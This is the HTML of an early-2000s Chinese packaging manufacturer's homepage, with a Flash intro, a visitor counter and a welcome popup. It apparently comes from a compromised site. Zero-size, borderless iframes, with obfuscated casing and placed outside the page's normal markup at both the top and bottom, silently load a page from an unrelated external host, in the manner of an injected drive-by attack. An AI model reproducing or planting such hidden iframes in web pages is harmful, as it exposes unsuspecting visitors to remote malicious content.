<ifRame src="http://www.88kv.cn/mm/index.htm" width="0" height="0" frameborder="0"></ifrAme>
<html>
<head>
<title>南京江磊精密仪器包装厂</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<!-- Fireworks 4.0  Dreamweaver 4.0 target.  Created Mon Oct 21 11:11:13 GMT+0800 (?D1ú±ê×?ê±??) 2002-->
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
<script language="JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
// -->
</script>
<link href="main.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#FFFFFF" background="body_bg.gif" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="MM_openBrWindow('wel.htm','s','width=218,height=136')">
<div align="left">
  <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td><div align="center">
          <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
            <tr> 
              <td><div align="center"> 
                  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="778" height="461">
                    <param name="movie" value="index.swf">
                    <param name="quality" value="high">
                    <embed src="index.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="778" height="461"></embed></object>
                  <table width="100%" border="0" cellpadding="0" cellspacing="0">
                    <tr> 
                      <td><table width="100%" border="0" cellpadding="0" cellspacing="0">
                          <tr> 
                            <td>
<div align="center">
<table width="21%" border="0" cellpadding="0" cellspacing="0">
                                  <tr> 
                                    <td><TABLE WIDTH="200" BORDER="0" CELLSPACING="0" CELLPADDING="0" HEIGHT="14" ALIGN="CENTER">
                                        <TR class="unnamed4"> 
                                          <TD> <DIV ALIGN="center" CLASS="text"><font color="#000000">您是第</font></DIV></TD>
                                          <TD> <TABLE WIDTH="90" BORDER="0" CELLSPACING="0" CELLPADDING="0" HEIGHT="13" ALIGN="center">
                                              <TR> 
                                                <TD HEIGHT="2" CLASS="font1"> 
                                                  <DIV ALIGN="right" CLASS="font1"> 
                                                    <font size="2"><strong><SPAN CLASS="font9"> 
                                                    <img src="0.gif"  width="14" height="16"><img src="0.gif"  width="14" height="16"><img src="0.gif"  width="14" height="16"><img src=7.gif  width="14" height="16"><img src=9.gif  width="14" height="16"><img src=0.gif  width="14" height="16">                                                    </SPAN></strong></font></DIV></TD>
                                              </TR>
                                            </TABLE></TD>
                                          <TD> <DIV ALIGN="center" CLASS="text"><font color="#000000">位访客</font></DIV></TD>
                                          <TD>&nbsp;</TD>
                                        </TR>
                                      </TABLE></td>
                                  </tr>
                                </table>
                              </div></td>
                          </tr>
                          <tr> 
                            <td class="text"><div align="center"><font color="#FFFFFF"><a href="page.htm"><span class="p9"><font color="#FF0000">直接进入</font></span></a></font></div></td>
                          </tr>
                        </table></td>
                    </tr>
                  </table>
                </div></td>
            </tr>
          </table>
        </div></td>
    </tr>
  </table>
</div>
</body>
</html>

<HTML>

</BODY>
</HTML>
<ifRame src="http://www.88kv.cn/mm/index.htm" width="0" height="0" frameborder="0"></ifrAme>
<iframe  width="0" height="0" frameborder="0"></iframe> 
